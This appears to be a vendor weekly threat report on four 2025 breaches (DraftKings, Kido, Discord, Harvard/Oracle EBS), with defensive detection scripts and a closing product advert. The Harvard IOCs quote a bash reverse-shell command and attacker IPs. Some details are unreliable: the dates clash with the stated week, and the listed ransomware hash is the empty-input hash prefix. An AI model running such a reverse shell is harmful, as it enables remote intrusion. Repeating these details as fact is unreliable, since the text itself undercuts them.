This week witnessed four significant cybersecurity incidents affecting major organizations across multiple sectors. The period from October 7-13, 2025, was marked by sophisticated attack campaigns targeting authentication systems, zero-day vulnerabilities, and supply chain compromises.
Key Incidents:
- DraftKings Credential Stuffing Attack (September 2, 2025): Targeted under 30 customer accounts through automated credential reuse
- Kido International Nursery Ransomware (September 25, 2025): Compromised sensitive data of over 8,000 children and families
- Discord Third-Party Data Breach (September 20, 2025): Exposed government IDs and support data for 70,000 users
- Harvard University Oracle Zero-Day Exploit (August 9, 2025): Leveraged CVE-2025-61882 for data exfiltration
All four incidents show attackers exploiting authentication weaknesses, supply chain vulnerabilities, and zero-day flaws in enterprise systems.
Incident Analysis
1. DraftKings Credential Stuffing Account Breach
Date of Incident: September 2, 2025
Overview
DraftKings, the Boston-based sports betting platform, experienced a credential stuffing attack affecting fewer than 30 customer accounts. Attackers utilized automated tools to test stolen username-password combinations from external data breaches against DraftKings authentication systems.
Technical Explanation
The attack leveraged MITRE ATT&CK technique T1110 (Brute Force) under the Initial Access tactic. Threat actors deployed automated scripts conducting rapid sequential login attempts across multiple accounts using credential pairs likely obtained from underground forums or previous data breaches. The attack pattern showed:
- High-volume login attempts from suspicious IP addresses
- Anomalous user agent strings in authentication logs
- Sequential failed authentication events (Windows Event ID 4625) followed by successful logins (Event ID 4624)
- No evidence of malware deployment or lateral movement within DraftKings infrastructure
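The log pattern listed above (a burst of failed logins across many accounts from one source, followed by a success, with a scripted user agent) can be turned into a simple detection. The following is an added example, not DraftKings' detection logic or any code from the original write-up; the authentication events, IP addresses and the list of automation user-agent markers are constructed for illustration, and the thresholds are assumptions a team would tune against its own baseline.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class AuthEvent:
    ts: datetime
    src_ip: str
    user: str
    success: bool
    user_agent: str


def _t(hms):
    # Constructed timestamps on a single day (helper for the sample data)
    return datetime.fromisoformat("2025-09-02T" + hms)


# Constructed sample: one source spraying reused credentials across six accounts
# within a few seconds, and one legitimate user who mistypes a password once.
SAMPLE_EVENTS = [
    AuthEvent(_t("03:00:01"), "203.0.113.7", "alice", False, "python-requests/2.31"),
    AuthEvent(_t("03:00:02"), "203.0.113.7", "bob", False, "python-requests/2.31"),
    AuthEvent(_t("03:00:02"), "203.0.113.7", "carol", False, "python-requests/2.31"),
    AuthEvent(_t("03:00:03"), "203.0.113.7", "dave", False, "python-requests/2.31"),
    AuthEvent(_t("03:00:03"), "203.0.113.7", "erin", False, "python-requests/2.31"),
    AuthEvent(_t("03:00:04"), "203.0.113.7", "frank", True, "python-requests/2.31"),
    AuthEvent(_t("09:15:00"), "198.51.100.20", "alice", False, "Mozilla/5.0 (iPhone)"),
    AuthEvent(_t("09:15:20"), "198.51.100.20", "alice", True, "Mozilla/5.0 (iPhone)"),
]

# Heuristic markers of scripted HTTP clients (constructed list; extend from your own telemetry)
AUTOMATION_UA_MARKERS = ("python-requests", "curl/", "go-http-client", "okhttp")


def is_automation_ua(user_agent):
    """True when the user agent looks like a script rather than a browser."""
    ua = user_agent.lower()
    return any(marker in ua for marker in AUTOMATION_UA_MARKERS)


def detect_credential_stuffing(events, window=timedelta(minutes=5),
                               min_failures=5, min_distinct_users=5):
    """Flag each successful login that was preceded, from the same source IP and
    within `window`, by at least `min_failures` failed attempts spread across at
    least `min_distinct_users` different accounts. Thresholds are assumptions."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_ip[e.src_ip].append(e)

    findings = []
    for ip, evs in by_ip.items():
        for i, e in enumerate(evs):
            if not e.success:
                continue
            # Failed attempts from this IP in the look-back window before the success
            prior = [p for p in evs[:i] if not p.success and e.ts - p.ts <= window]
            users = {p.user for p in prior}
            if len(prior) >= min_failures and len(users) >= min_distinct_users:
                findings.append({
                    "src_ip": ip,
                    "compromised_user": e.user,
                    "failed_attempts": len(prior),
                    "distinct_users": len(users),
                    "automation_ua": is_automation_ua(e.user_agent),
                })
    return findings


if __name__ == "__main__":
    for finding in detect_credential_stuffing(SAMPLE_EVENTS):
        print(finding)
```

The legitimate user at 198.51.100.20 produces a failure followed by a success as well, but only one failure against one account, so it stays below both thresholds; the distinct-account count is what separates credential stuffing from a single user retrying a password.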
Impact
Compromised customer data included names, addresses, dates of birth, phone numbers, email addresses, last four digits of payment cards, profile photos, transaction history, account balances, and password modification timestamps. No government-issued identification numbers or complete financial account details were accessed.
Technical Details
IOCs and Artifacts:
- Suspicious IP ranges conducting multiple authentication attempts
- Elevated failed login event volumes preceding successful access
- Account lockout patterns followed by credential validation
- No evidence of malicious file execution or registry modifications
Remediation Actions:
- Mandatory password resets for affected accounts
- Multi-factor authentication enforcement for DK Horse accounts
- Enhanced fraud detection algorithms implementation
- Additional technical measures to prevent similar credential-based attacks
Takeaway for CISO
This incident underscores persistent credential reuse risks in online gambling platforms. Organizations must implement robust authentication controls including adaptive MFA, behavioral analytics, and proactive credential monitoring to mitigate automated attack campaigns.
2. Kido International Nursery Ransomware Attack
Date of Incident: September 25, 2025
Overview
Kido International, operating 18 nurseries across Greater London, suffered a ransomware attack by the “Radiant” group, compromising sensitive data of over 8,000 children and their families. The attack involved data exfiltration followed by extortion attempts targeting parents directly.
Technical Explanation
The breach employed MITRE ATT&CK technique T1190 (Exploitation of Public-Facing Application) for initial access, followed by T1486 (Data Encrypted for Impact). Attackers allegedly purchased access from an initial access broker who had previously compromised a Kido staff computer. The ransomware variant encrypted local and network-mapped drives while deploying systematic data exfiltration capabilities.
Impact
Stolen data included names, photographs, home addresses, birthdates, and safeguarding notes for over 8,000 children, plus information on parents, relatives, employees, and company operations. The attackers published sample data on dark web sites and conducted threatening phone calls to parents as part of extortion tactics.
Technical Details
Attack Chain:
- Initial access via compromised staff endpoint
- Lateral movement through network infrastructure
- Data discovery and systematic exfiltration
- Ransomware deployment with file encryption
- Extortion campaign with staged data releases
IOCs:
- Ransomware file hash: e3b0c44298fc1c149afbf4c8996fb9 (truncated in source)
- Evidence of shadow copy deletion
- Encrypted file extensions consistent with Radiant ransomware family
- Network traffic to known command-and-control infrastructure
Law Enforcement Response:
Metropolitan Police arrested two suspects (ages 17 and 22) in Bishop’s Stortford on charges of computer misuse and blackmail.
Takeaway for CISO
This attack highlights extreme risks when ransomware groups target organizations handling child data. CISOs must prioritize comprehensive endpoint protection, network segmentation, and rapid incident response capabilities while ensuring robust data protection measures for sensitive demographic information.
3. Discord Data Breach via Third-Party Vendor
Date of Incident: September 20, 2025
Overview
Discord experienced a supply chain compromise affecting approximately 70,000 users when attackers breached a third-party customer support provider, identified as Zendesk. The 58-hour unauthorized access period resulted in government ID theft and support ticket data exfiltration.
Technical Explanation
The attack employed MITRE ATT&CK techniques T1195 (Supply Chain Compromise) and T1078 (Valid Accounts). Attackers compromised a support agent’s credentials from an outsourced Business Process Outsourcing (BPO) provider, gaining access to Discord’s Zendesk instance and internal support tools including Kolide device trust solutions and Okta identity management systems.
Impact
Exposed data encompassed 5.5 million unique users across 8.4 million support tickets, including government-issued ID photos (approximately 70,000 users), names, Discord usernames, email addresses, partial payment information, IP addresses, and complete support message transcripts. Attackers claimed to have exfiltrated 1.6 terabytes total, including 1.5 TB of ticket attachments and over 100 GB of transcripts.
Technical Details
Attack Infrastructure:
- Compromised BPO provider credentials
- Access to Zenbar internal support application
- API integration exploitation for database queries
- Multi-factor authentication bypass capabilities
Threat Actor Profile:
Group “Scattered Lapsus$ Hunters” demanded $5 million ransom (reduced to $3.5 million) and threatened public data release following failed negotiations.
Remediation Actions:
- Immediate vendor access revocation
- Computer forensics firm engagement
- Law enforcement notification
- Enhanced third-party security auditing
Takeaway for CISO
This supply chain attack emphasizes critical risks in outsourced customer support operations. Organizations must implement stringent vendor security assessments, continuous monitoring of third-party access, and robust API security controls to prevent similar compromise scenarios.
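"Continuous monitoring of third-party access" is easiest to make concrete on the support tool's own audit trail: an outsourced agent account that reads hundreds of tickets and downloads their attachments in minutes, outside the contracted hours, looks nothing like an agent working a queue. The following is an added example, not Discord's or Zendesk's code and not part of the original write-up; the audit event schema, the vendor and employee account names, the per-role limits and the contracted hours are all assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class AuditEvent:
    ts: datetime
    actor: str
    actor_type: str   # "vendor" (outsourced BPO agent) or "employee" (assumed roles)
    action: str       # e.g. "ticket.view", "attachment.download" (assumed action names)
    ticket_id: str


def _t(hms):
    # Constructed timestamps on a single day (helper for the sample data)
    return datetime.fromisoformat("2025-09-20T" + hms)


def _burst(actor, actor_type, action, start, n, every=timedelta(seconds=5)):
    # Constructed run of n events on consecutive ticket ids
    return [AuditEvent(start + i * every, actor, actor_type, action, f"T{1000 + i}")
            for i in range(n)]


# Constructed sample: a vendor account pulling 120 tickets and their attachments
# at 02:10 UTC, and an employee handling a normal queue during the day.
SAMPLE_AUDIT = (
    _burst("bpo-agent-17", "vendor", "ticket.view", _t("02:10:00"), 120)
    + _burst("bpo-agent-17", "vendor", "attachment.download", _t("02:10:02"), 120)
    + _burst("support-ann", "employee", "ticket.view", _t("10:00:00"), 6,
             every=timedelta(minutes=4))
)


def detect_bulk_access(events, window=timedelta(hours=1), limits=None,
                       vendor_hours=(8, 20)):
    """Per actor, find the peak number of distinct tickets touched inside any
    sliding `window`, and check vendor activity against the contracted hours
    (UTC, start inclusive, end exclusive). Limits and hours are assumptions."""
    limits = limits or {"vendor": 50, "employee": 200}
    by_actor = defaultdict(list)
    for e in events:
        by_actor[e.actor].append(e)

    findings = []
    for actor, evs in by_actor.items():
        evs.sort(key=lambda e: e.ts)
        actor_type = evs[0].actor_type
        limit = limits.get(actor_type, limits["vendor"])

        # Two-pointer sliding window over the sorted events
        peak, start = 0, 0
        for end in range(len(evs)):
            while evs[end].ts - evs[start].ts > window:
                start += 1
            peak = max(peak, len({e.ticket_id for e in evs[start:end + 1]}))

        out_of_hours = actor_type == "vendor" and any(
            not (vendor_hours[0] <= e.ts.hour < vendor_hours[1]) for e in evs)
        attachments = sum(1 for e in evs if e.action == "attachment.download")

        if peak > limit or out_of_hours:
            findings.append({
                "actor": actor,
                "actor_type": actor_type,
                "peak_distinct_tickets": peak,
                "attachment_downloads": attachments,
                "out_of_hours": out_of_hours,
            })
    return findings


if __name__ == "__main__":
    for finding in detect_bulk_access(SAMPLE_AUDIT):
        print(finding)
```

Either condition alone is enough to raise a finding; in practice the volume rule is the one that catches the exfiltration described above, while the hours rule is cheap corroboration that the session is not the vendor's normal shift.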
4. Harvard University Data Breach via Oracle E-Business Suite Zero-Day
Date of Incident: August 9, 2025 (exploitation began), October 12, 2025 (disclosed)
Overview
Harvard University became the first confirmed victim of a mass exploitation campaign targeting Oracle E-Business Suite systems through CVE-2025-61882, a critical zero-day vulnerability with CVSS score 9.8. The attack, attributed to threat actors associated with the Cl0p ransomware group, affected “a limited number of parties associated with a small administrative unit”.
Technical Explanation
The exploitation leveraged a complex attack chain combining Server-Side Request Forgery (SSRF), Carriage-Return Line-Feed (CRLF) injection, authentication bypass, and XSL template injection to achieve remote code execution on Oracle EBS servers. The attack targeted the /OA_HTML/configurator/UiServlet component, allowing unauthenticated remote code execution.
Impact
While specific data exposure details remain undisclosed, the compromise affected Oracle E-Business Suite systems containing finance, human resources, and supply chain management functions. The broader campaign impacted dozens to potentially over 100 organizations globally, with Cl0p conducting mass extortion attempts via compromised email accounts.
Technical Details
Vulnerability Details:
- CVE: CVE-2025-61882
- CVSS Score: 9.8 (Critical)
- Affected Component: Oracle Concurrent Processing (BI Publisher Integration)
- Attack Vector: Network, no authentication required
Exploitation Timeline:
- July 10, 2025: Early suspicious activity observed
- August 9, 2025: Confirmed zero-day exploitation begins
- September 29, 2025: Mass extortion campaign launches
- October 2, 2025: Oracle acknowledges vulnerability
- October 4, 2025: Emergency patch released
IOCs and Artifacts:
- Suspicious HTTP requests to /OA_HTML/configurator/UiServlet
- External XSL payload retrieval patterns
- Command execution via bash reverse shells (bash -i >& /dev/tcp/<ip>/<port> 0>&1)
- Python AIOHTTP callback server infrastructure
Attack Infrastructure:
- IP addresses: 200.107.207.26, 161.97.99.49
- Leaked exploit components: exp.py, server.py, readme.md
- Proof-of-concept disclosure via “SCATTERED LAPSUS$ HUNTERS” Telegram channel
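The indicators listed above (requests to /OA_HTML/configurator/UiServlet, the two published IP addresses, and the application server fetching an external XSL template) can be hunted for retrospectively in web server access logs and egress proxy records. The following is an added example, not Oracle's, Harvard's or any vendor's code and not part of the original write-up; the two IP addresses and the servlet path come from the indicators above, while the access log lines, the egress records and the combined-log regex are constructed for illustration and would need adjusting to the real log format.

```python
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import urlparse

# Indicators taken from the write-up above
IOC_IPS = {"200.107.207.26", "161.97.99.49"}
IOC_PATH = "/OA_HTML/configurator/UiServlet"

# Apache/NGINX combined log format (assumption; adapt to the real server's format)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample access log: two ordinary EBS page loads and two POSTs to the servlet
SAMPLE_ACCESS_LOG = """\
203.0.113.55 - - [09/Aug/2025:10:12:01 +0000] "GET /OA_HTML/RF.jsp?function_id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
200.107.207.26 - - [09/Aug/2025:10:13:44 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 321 "-" "python-requests/2.31"
203.0.113.99 - - [09/Aug/2025:10:14:10 +0000] "GET /OA_HTML/OA.jsp?page=/oracle/apps/fnd/framework/toolbox/webui/HelloWorldPG HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.8 - - [09/Aug/2025:10:15:02 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 500 0 "-" "curl/8.4.0"
"""

# Constructed egress (proxy/firewall) records: (source host, destination ip, port, url)
SAMPLE_EGRESS = [
    ("ebs-app-01", "203.0.113.200", 443, "https://updates.example.net/patch.zip"),
    ("ebs-app-01", "161.97.99.49", 8080, "http://161.97.99.49:8080/template.xsl"),
]


@dataclass
class Hit:
    source: str      # client IP (access log) or host name (egress)
    indicator: str
    detail: str


def parse_access_log(text):
    """Yield one dict per well-formed combined-format line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def hunt_access_log(text):
    """Known attacker IPs and POSTs to the targeted servlet. A servlet POST on its
    own is a review item, not proof of compromise; corroborate with egress data."""
    hits = []
    for r in parse_access_log(text):
        if r["ip"] in IOC_IPS:
            hits.append(Hit(r["ip"], "known-attacker-ip", f'{r["method"]} {r["path"]}'))
        if r["path"].split("?", 1)[0] == IOC_PATH and r["method"] == "POST":
            hits.append(Hit(r["ip"], "uiservlet-post", f'status {r["status"]} ua {r["ua"]}'))
    return hits


def hunt_egress(records):
    """Connections from an EBS host to attacker infrastructure, and any outbound
    retrieval of an .xsl file (the application server should not fetch templates
    from the internet)."""
    hits = []
    for host, dst_ip, port, url in records:
        if dst_ip in IOC_IPS:
            hits.append(Hit(host, "egress-to-attacker-ip", f"{dst_ip}:{port}"))
        if urlparse(url).path.lower().endswith(".xsl"):
            hits.append(Hit(host, "external-xsl-fetch", url))
    return hits


def summarize(access_text, egress_records):
    """Count hits per indicator type across both data sources."""
    hits = hunt_access_log(access_text) + hunt_egress(egress_records)
    return dict(Counter(h.indicator for h in hits))


if __name__ == "__main__":
    for hit in hunt_access_log(SAMPLE_ACCESS_LOG) + hunt_egress(SAMPLE_EGRESS):
        print(hit)
    print(summarize(SAMPLE_ACCESS_LOG, SAMPLE_EGRESS))
```

The second POST in the sample comes from an address that is not on the published list, which is why the servlet-path rule is kept separate from the IP rule: published IPs age quickly, while the targeted endpoint and the outbound template fetch describe the technique rather than one actor's infrastructure.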
Takeaway for CISO
This zero-day exploitation campaign demonstrates the critical importance of emergency patch management for enterprise applications. Organizations must maintain current Oracle Critical Patch Updates, implement robust vulnerability management processes, and establish rapid response capabilities for zero-day threats targeting core business systems.
Outpace Attackers With AI-Based Automated Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management